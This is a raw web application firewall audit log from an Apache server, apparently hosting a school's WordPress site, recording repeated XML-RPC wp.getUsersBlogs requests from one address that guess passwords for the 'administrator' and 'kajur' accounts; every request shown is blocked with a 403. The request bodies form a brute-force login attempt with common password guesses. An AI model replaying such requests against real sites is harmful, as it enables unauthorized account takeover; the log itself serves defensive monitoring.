Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4c0a1b51-Z--
--6d41e22a-A--
[19/Apr/2025:22:55:38 +0700] aAPHeuvDiFC_ir7MDwZP4QAAAEU 103.236.140.4 56456 103.236.140.4 8181
--6d41e22a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6d41e22a-C--
wp.getUsersBlogs
administrator
121212
--6d41e22a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6d41e22a-E--
--6d41e22a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078138336663 4345 (- - -)
Stopwatch2: 1745078138336663 4345; combined=3323, p1=342, p2=2805, p3=0, p4=0, p5=102, sr=74, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6d41e22a-Z--
--aa588b7c-A--
[19/Apr/2025:22:56:40 +0700] aAPHuHNa4dA2HllpK_PlKQAAAI8 103.236.140.4 56940 103.236.140.4 8181
--aa588b7c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--aa588b7c-C--
wp.getUsersBlogs
administrator
123.456
--aa588b7c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--aa588b7c-E--
--aa588b7c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078200817406 5514 (- - -)
Stopwatch2: 1745078200817406 5514; combined=3899, p1=456, p2=3276, p3=0, p4=0, p5=98, sr=88, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--aa588b7c-Z--
--87539c7b-A--
[19/Apr/2025:22:57:40 +0700] aAPH9EruoUXZj665VUFvcgAAAMs 103.236.140.4 57280 103.236.140.4 8181
--87539c7b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--87539c7b-C--
wp.getUsersBlogs
administrator
office
--87539c7b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--87539c7b-E--
--87539c7b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078260406869 5731 (- - -)
Stopwatch2: 1745078260406869 5731; combined=4454, p1=558, p2=3669, p3=0, p4=0, p5=129, sr=129, sw=98, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--87539c7b-Z--
--8221a460-A--
[19/Apr/2025:22:58:44 +0700] aAPINOvDiFC_ir7MDwZQPAAAAFM 103.236.140.4 57610 103.236.140.4 8181
--8221a460-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8221a460-C--
wp.getUsersBlogs
administrator
Qwerty
--8221a460-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8221a460-E--
--8221a460-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078324414149 5624 (- - -)
Stopwatch2: 1745078324414149 5624; combined=4331, p1=529, p2=3599, p3=0, p4=0, p5=119, sr=90, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8221a460-Z--
--27378a2b-A--
[19/Apr/2025:22:59:45 +0700] aAPIcXNa4dA2HllpK_PlWwAAAIw 103.236.140.4 57916 103.236.140.4 8181
--27378a2b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--27378a2b-C--
wp.getUsersBlogs
administrator
123456qwe
--27378a2b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--27378a2b-E--
--27378a2b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078385417159 5213 (- - -)
Stopwatch2: 1745078385417159 5213; combined=3888, p1=455, p2=3231, p3=0, p4=0, p5=126, sr=90, sw=76, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--27378a2b-Z--
--8a4e0971-A--
[19/Apr/2025:23:00:50 +0700] aAPIsg6cTFSgLAHl7PpL_QAAABI 103.236.140.4 58228 103.236.140.4 8181
--8a4e0971-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8a4e0971-C--
wp.getUsersBlogs
administrator
rockyou
--8a4e0971-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8a4e0971-E--
--8a4e0971-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078450210157 4929 (- - -)
Stopwatch2: 1745078450210157 4929; combined=3811, p1=456, p2=3175, p3=0, p4=0, p5=106, sr=79, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8a4e0971-Z--
--3637d37c-A--
[19/Apr/2025:23:01:17 +0700] aAPIzQ6cTFSgLAHl7PpMEAAAAAE 103.236.140.4 58362 103.236.140.4 8181
--3637d37c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--3637d37c-C--
wp.getUsersBlogs
administrator
1234%^&*
--3637d37c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3637d37c-E--
--3637d37c-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078477680564 4420 (- - -)
Stopwatch2: 1745078477680564 4420; combined=3349, p1=361, p2=2824, p3=0, p4=0, p5=97, sr=78, sw=67, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3637d37c-Z--
--d273f953-A--
[19/Apr/2025:23:01:50 +0700] aAPI7kruoUXZj665VUFv3AAAAM8 103.236.140.4 58534 103.236.140.4 8181
--d273f953-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d273f953-C--
wp.getUsersBlogs
administrator
7777777
--d273f953-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d273f953-E--
--d273f953-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078510029782 5304 (- - -)
Stopwatch2: 1745078510029782 5304; combined=3933, p1=465, p2=3300, p3=0, p4=0, p5=99, sr=84, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d273f953-Z--
--df845300-A--
[19/Apr/2025:23:02:53 +0700] aAPJLQ6cTFSgLAHl7PpMOAAAABY 103.236.140.4 58874 103.236.140.4 8181
--df845300-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--df845300-C--
wp.getUsersBlogs
administrator
dubsmash
--df845300-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--df845300-E--
--df845300-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078573262428 5554 (- - -)
Stopwatch2: 1745078573262428 5554; combined=4126, p1=510, p2=3435, p3=0, p4=0, p5=107, sr=92, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--df845300-Z--
--9cacd25d-A--
[19/Apr/2025:23:03:53 +0700] aAPJaQ6cTFSgLAHl7PpMXwAAAAc 103.236.140.4 59154 103.236.140.4 8181
--9cacd25d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 227
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9cacd25d-C--
wp.getUsersBlogs
administrator
Testing1
--9cacd25d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9cacd25d-E--
--9cacd25d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078633343494 5190 (- - -)
Stopwatch2: 1745078633343494 5190; combined=3663, p1=432, p2=3047, p3=0, p4=0, p5=106, sr=87, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9cacd25d-Z--
--5070705d-A--
[19/Apr/2025:23:04:58 +0700] aAPJquvDiFC_ir7MDwZQpgAAAEc 103.236.140.4 59436 103.236.140.4 8181
--5070705d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--5070705d-C--
wp.getUsersBlogs
administrator
bubbles
--5070705d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5070705d-E--
--5070705d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (14+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078698339224 5516 (- - -)
Stopwatch2: 1745078698339224 5516; combined=3925, p1=445, p2=3228, p3=0, p4=0, p5=141, sr=85, sw=111, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5070705d-Z--
--f6de3f27-A--
[19/Apr/2025:23:06:00 +0700] aAPJ6HNa4dA2HllpK_PluwAAAJU 103.236.140.4 59758 103.236.140.4 8181
--f6de3f27-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f6de3f27-C--
wp.getUsersBlogs
administrator
melissa
--f6de3f27-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f6de3f27-E--
--f6de3f27-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078760928372 5084 (- - -)
Stopwatch2: 1745078760928372 5084; combined=3694, p1=429, p2=3088, p3=0, p4=0, p5=103, sr=80, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f6de3f27-Z--
--f6334c40-A--
[19/Apr/2025:23:07:06 +0700] aAPKKg6cTFSgLAHl7PpMzQAAABc 103.236.140.4 60086 103.236.140.4 8181
--f6334c40-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 230
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f6334c40-C--
wp.getUsersBlogs
administrator
Bangbang123
--f6334c40-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f6334c40-E--
--f6334c40-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078826821355 5461 (- - -)
Stopwatch2: 1745078826821355 5461; combined=3842, p1=462, p2=3205, p3=0, p4=0, p5=103, sr=87, sw=72, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f6334c40-Z--
--f7438923-A--
[19/Apr/2025:23:08:06 +0700] aAPKZg6cTFSgLAHl7PpM5QAAAAY 103.236.140.4 60394 103.236.140.4 8181
--f7438923-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 215
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f7438923-C--
wp.getUsersBlogs
kajur
pass
--f7438923-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f7438923-E--
--f7438923-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078886659019 5293 (- - -)
Stopwatch2: 1745078886659019 5293; combined=3891, p1=495, p2=3194, p3=0, p4=0, p5=116, sr=129, sw=86, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f7438923-Z--
--f3abdc43-A--
[19/Apr/2025:23:09:10 +0700] aAPKpg6cTFSgLAHl7PpM8QAAABY 103.236.140.4 60730 103.236.140.4 8181
--f3abdc43-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f3abdc43-C--
wp.getUsersBlogs
kajur
r007p455w0rd
--f3abdc43-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f3abdc43-E--
--f3abdc43-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745078950649812 4761 (- - -)
Stopwatch2: 1745078950649812 4761; combined=3707, p1=456, p2=3056, p3=0, p4=0, p5=112, sr=84, sw=83, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f3abdc43-Z--
--54f23740-A--
[19/Apr/2025:23:10:10 +0700] aAPK4nNa4dA2HllpK_PmEwAAAIY 103.236.140.4 32774 103.236.140.4 8181
--54f23740-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--54f23740-C--
